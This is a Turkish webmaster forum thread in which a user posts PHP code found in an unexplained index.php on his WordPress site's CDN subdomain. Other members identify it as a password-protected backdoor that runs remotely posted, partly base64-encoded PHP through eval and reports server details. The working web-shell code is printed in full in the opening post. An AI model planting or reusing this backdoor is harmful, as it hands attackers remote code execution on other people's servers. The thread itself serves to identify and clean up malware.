-
Üyelik
27.11.2013
-
Yaş/Cinsiyet
35 / E
-
Meslek
İnternet Danışmanı
-
Konum
İstanbul Avrupa
-
Ad Soyad
H** K**
-
Mesajlar
735
-
Beğeniler
121 / 106
-
Ticaret
6, (%100)
Merhaba, bu kodun ne işe yaradığını bilmeniz mümkün mü acaba?
$_passssword = "asldkjsdfhoiuer3u98iuefghkjdbvmnbkjhas398";
if (!@$_POST["p2"] AND $_POST["pass"]==$_passssword) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"safemode" => @ini_get("safe_mode"),
);
echo serialize($a);
exit;
} elseif(!empty($_POST["p2"]) AND $_POST["pass"]==$_passssword) {
eval(base64_decode($_POST["p2"]));
exit;
} elseif(!empty($_POST["p1"]) AND $_POST["pass"]==$_passssword) {
eval($_POST["p1"]);
exit;
}
unset($_passssword);
-
Üyelik
17.05.2015
-
Yaş/Cinsiyet
44 / E
-
Meslek
grafik tasarım
-
Konum
İstanbul Anadolu
-
Ad Soyad
F** A**
-
Mesajlar
40
-
Beğeniler
1 / 4
-
Ticaret
0, (%0)
eval daima sakattır. adam gibi programlayan kimse eval kullanmaz. genelde sitede sakat olaylar yapmak isteyenler eval kullanır.
zaten yukardaki scriptte php_uname() ile php bilgilerini alıyor php sürümünü alıyor ve safemod bilgisini alıyor. Uzak makineden post ederek bunları elde ediyor.
ÖZET. SİL GİTSİN. KÖTÜ AMAÇLI YAZILIMA BENZİYOR
Alicevat
Falanlar, Filanlar...
Kullanıcı
-
Üyelik
27.04.2015
-
Yaş/Cinsiyet
40 / E
-
Meslek
Yazılım Mühendisi
-
Konum
İstanbul Anadolu
-
Ad Soyad
A** Y**
-
Mesajlar
457
-
Beğeniler
43 / 202
-
Ticaret
1, (%100)
Selamlar.
Bu şekilde cevap vermek zor. Bu kodun kullanıldığı yer hakkında bilgi verirsen hangi amaçla yazıldığını söyleyebiliriz. Onun haricinde bir çok farklı amaç için kullanılabilir.
AkıllıSoft Yazılım & Bilişim Teknolojileri
JexyR
Codeigniter / Symfony
Kullanıcı
-
Üyelik
27.04.2015
-
Yaş/Cinsiyet
40 / E
-
Meslek
Yazılım Müh.
-
Konum
Diğer
-
Ad Soyad
K** T**
-
Mesajlar
183
-
Beğeniler
11 / 62
-
Ticaret
0, (%0)
eval() : içine gelen bir değeri php olarak yorumlar ve çalıştırır. Bilgisizce kullanıldığında açıktır sadece.
Kod ise : sayfaya form tarafından ya da 3. parti bir yazılım tarafından post eden 'password' verisi ile $_password değişkenindeki değeri kontrol ediyor.
Eğer şifre doğru ise ;
sayfaya dışardan post edilen p2 php kodunu çalıştırır. eğer p2 yok p1 isminde bir form elementi post edilmiş ise p1 ile post edilen değişkeni php olarak çalıştırıyor.
Bu kodları siz eklemediyseniz siliniz aksi takdirde hacklink vs durumlara maruz kalabilirsiniz.
-
Üyelik
12.06.2012
-
Yaş/Cinsiyet
38 / E
-
Meslek
Öğretmen
-
Konum
Samsun
-
Ad Soyad
O** Y**
-
Mesajlar
1722
-
Beğeniler
398 / 400
-
Ticaret
20, (%100)
Bu dosyanının bulunduğu adreste istenilen php kodun çalıştırılması mümkün. php'nin yapabildiği birçok şey yapabilir bununla.
Özetle, bu dosya zararlıdır. :)
.
-
Üyelik
27.11.2013
-
Yaş/Cinsiyet
35 / E
-
Meslek
İnternet Danışmanı
-
Konum
İstanbul Avrupa
-
Ad Soyad
H** K**
-
Mesajlar
735
-
Beğeniler
121 / 106
-
Ticaret
6, (%100)
Yorumlariniz icin ayri ayri tesekkur ederim arkadaşlar wordpress sitede resimleri yukledigim cdn subdomainindeki bir klasorde gordum iindex.php suphe uyandirdi bende cunku dosyayi ben eklemedim. Masaustune attim ve sunucudan sildim.
Bir kac ay once yuzlerce virus ve spam sildim siteden cok sayida hacklink saldirisi olmus neredeyse hepsini temizledim ama gozden kacanlar olmus demekki.
Hosting firmasina tarama da yaptirdim fakat saniyorum bu tur kodlarin taramada bulunmasi mumkun degil.